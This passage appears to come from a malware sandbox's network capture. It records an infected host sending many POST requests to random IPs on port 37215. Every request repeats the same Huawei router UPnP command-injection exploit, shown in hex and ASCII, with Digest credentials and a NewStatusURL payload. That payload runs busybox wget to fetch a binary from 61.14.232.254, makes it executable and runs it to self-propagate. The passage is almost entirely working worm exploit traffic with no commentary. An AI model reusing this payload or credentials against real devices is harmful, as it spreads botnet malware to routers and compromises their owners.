20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2293192.168.2.135703841.114.91.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782707930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2294192.168.2.1358358197.47.28.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782727003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2295192.168.2.136099841.93.231.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782744884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2296192.168.2.1343932197.166.225.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782881975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2297192.168.2.1339448197.17.169.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782896042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2298192.168.2.1351170157.228.36.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782917976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2299192.168.2.133609048.55.245.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782937050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2300192.168.2.1345762197.220.204.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782958031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2301192.168.2.135976639.130.183.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782977104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2302192.168.2.1353762157.52.225.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782994032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2303192.168.2.134142241.2.241.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783284903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
